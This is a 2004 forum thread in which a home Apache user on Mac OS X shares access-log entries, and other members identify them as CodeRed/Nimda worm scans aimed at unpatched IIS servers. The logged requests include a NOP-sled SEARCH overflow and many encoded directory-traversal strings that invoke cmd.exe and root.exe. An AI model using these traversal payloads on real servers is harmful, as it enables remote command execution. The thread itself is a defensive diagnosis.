Stupid windoz hackers... an annoiance, but should I be worried about my server?

walkingmac · Apr 5, 2004

ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

Every so often I get blips like this that also send my CPU screaming for a few minutes.:
12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

Is this a flood or something else?

and I get these alot:
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

I look up the IP address and it says this is somewhere in Lexington KY.
Any help?

Westside guy · Apr 5, 2004

This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

walkingmac · Apr 5, 2004

ok so the endless numbers that eat my CPU for a little bit is ALSO a M$ Webserver thing?

tomf87 · Apr 5, 2004

Westside guy said:
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

Jeewhizz · Apr 5, 2004

You can stop it being logged in your apache log if its bothering you...

More details here: http://forums.ev1servers.net/showthread.php?s=&threadid=3918&code+AND+red+AND+apache

Jee

7on · Apr 5, 2004

Would turning on the firewall stop such attacks to affect CPU speed?

tomf87 · Apr 5, 2004

7on said:
Would turning on the firewall stop such attacks to affect CPU speed?

No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.

Jeewhizz · Apr 5, 2004

depending on how you use it, you could just move apache to say port 81, close port 80 on the firewall, and then access apache via http://127.0.0.1:81/

Jee

walkingmac · Apr 5, 2004

It's not that it bothers me that it is logged (i like the fact that I can see whats going on atleast) rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just they are banging away at anything listening to 80 specifically or is it through my website (which ofcourse if on port 80)? How will moving my port to 81 affect my website? Would this then require something different then my current system of updating my IP address to the DNS? (sorry I don't know a whole lot about this stuff besides turning on and setting up services and making the websites

)

Jeewhizz · Apr 5, 2004

well i only use apache/mysql on my PC atm for local testing - and for showing clients their work... so its only accessed from outside the network when i give out a link - so i give out http://MY_IPADDRESS:81/client/index.php

Moving to port 81 would stop most of it, as they will be scanning all ip's on port 80 - which would be blocked by your firewall.

However, if you use your mac as a server alot, then moving to port 81 wouldn't be a good idea

Westside guy · Apr 5, 2004

tomf87 said:
Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

You're right; it's CodeRed. So it's a hacker once removed.

7on said:
Would turning on the firewall stop such attacks to affect CPU speed?

I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines".

superbovine · Apr 5, 2004

google for how to make a host.deny file and add the ip to your host.deny file.

Search

Search

Stupid windoz hackers... an annoiance, but should I be worried about my server?

walkingmac

macrumors 6502

Westside guy

macrumors 604

walkingmac

macrumors 6502

tomf87

macrumors 65816

Jeewhizz

macrumors regular

7on

macrumors 601

tomf87

macrumors 65816

Jeewhizz

macrumors regular

walkingmac

macrumors 6502

Jeewhizz

macrumors regular

Westside guy

macrumors 604

superbovine

macrumors 68030

Our Staff